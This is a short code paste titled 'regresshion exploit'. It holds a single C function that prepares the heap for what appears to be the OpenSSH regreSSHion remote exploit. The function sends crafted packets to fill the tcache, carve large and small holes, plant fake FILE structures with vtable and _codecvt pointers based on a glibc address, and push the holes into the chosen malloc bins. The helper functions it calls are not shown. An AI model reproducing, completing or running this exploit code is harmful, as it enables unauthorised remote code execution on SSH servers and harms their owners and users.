regresshion exploit
unknown
c_cpp
a year ago
1.3 kB
11
Indexable
void
prepare_heap(int sock) {
// Packet a: Allocate and free tcache chunks
for (int i = 0; i < 10; i++) {
unsigned char tcache_chunk[64];
memset(tcache_chunk, 'A', sizeof(tcache_chunk));
send_packet(sock, 5, tcache_chunk, sizeof(tcache_chunk));
// These will be freed by the server, populating tcache
}
// Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
for (int i = 0; i < 27; i++) {
// Allocate large chunk (~8KB)
unsigned char large_hole[8192];
memset(large_hole, 'B', sizeof(large_hole));
send_packet(sock, 5, large_hole, sizeof(large_hole));
// Allocate small chunk (320B)
unsigned char small_hole[320];
memset(small_hole, 'C', sizeof(small_hole));
send_packet(sock, 5, small_hole, sizeof(small_hole));
}
// Packet c: Write fake headers, footers, vtable and _codecvt pointers
for (int i = 0; i < 27; i++) {
unsigned char fake_data[4096];
create_fake_file_structure(fake_data, sizeof(fake_data),
GLIBC_BASES[0]);
send_packet(sock, 5, fake_data, sizeof(fake_data));
}
// Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
unsigned char large_string[MAX_PACKET_SIZE - 1];
memset(large_string, 'E', sizeof(large_string));
send_packet(sock, 5, large_string, sizeof(large_string));
}Editor is loading...
Leave a Comment